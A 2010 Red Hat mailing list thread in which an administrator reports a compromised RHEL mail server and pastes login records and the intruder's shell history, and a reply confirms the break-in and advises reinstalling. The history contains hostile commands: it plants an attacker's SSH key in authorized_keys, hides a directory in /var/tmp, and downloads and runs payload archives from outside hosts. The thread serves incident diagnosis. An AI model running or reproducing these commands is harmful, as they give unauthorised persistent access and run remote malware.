help

Marti, Robert RJM002 at shsu.edu
Thu Jan 28 12:08:48 UTC 2010 

Yes you were hacked. Hope you have backups because you should reinstall.

Sent from my iPhone

On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy at gmail.com> wrote:

> Hello all,
>                    i m using RHEL5.3 as a my mail server with real  
> ip.i
> configure my system mostly remotely.last login time of my system 27  
> jan
> from   this ip 118.129.153.43.
> than i try to login at 28 jan in morning so i can`t got  
> authentication as
> root from my last password.
> than i reboot the system reset my password.
> i login as a root than i run "last" command i m sending tha first 10  
> lines
> of last command...i thinks someone hack my system.i am sending history
> command output.
> now i remove .ssh directory and /var/tmp/*
>
> please suggest wat is this??
>
> thanks
>
> last command out put:
> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still  
> logged in
> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still  
> logged in
> root     tty1                          Thu Jan 28 10:48 - 10:52   
> (00:04)
> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45           
> (00:25)
> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52   
> (00:09)
> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27   
> (02:25)
> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34   
> (00:00)
> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33   
> (00:00)
> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32   
> (00:01)
> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51   
> (00:03)
>
> What is 165.red-79........this is nt my ip.
>
>
> History Output
>
> 115  cat /proc/cpuinfo
>  116  mkdir .ssh
>  117  cd .ssh
>  118  echo ssh-rsa
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod  
> 600
> ~/.ssh/authorized_keys
>  119  cd /var/tmp
>  120  mkdir " "
>  121  cd " "
> 122  passwd
>  123  echo ssh-rsa
> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod  
> 600
> ~/.ssh/authorized_keys
>  124  ps -x
>  125  cd /var/tmp
>  126  w
>  127  wget http://kok.ucoz.de/gosh.tgz
>  128  tar xvf gosh.tgz
>  129  cd gosh
>  130  chmod +x *
> 131  ./go.sh 121
>  132  w
>  133  ps -x
>  134  ps -aux
>  135  cd /var/tmp
>  136  cd " "
>  137  ls -a
>  138  wget http://helpbnc.myftp.org/danger/fld.tgz
>  139  tar xzvf fld.tgz
>  140  cd fld
>  141  chmod +x *
>  142  nano cyc.acc
>  143  nano cyc.acc.1
>  144  nano cyc.set
>  145  ./httpd
>  146  w
> -- 
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

More information about the redhat-list mailing list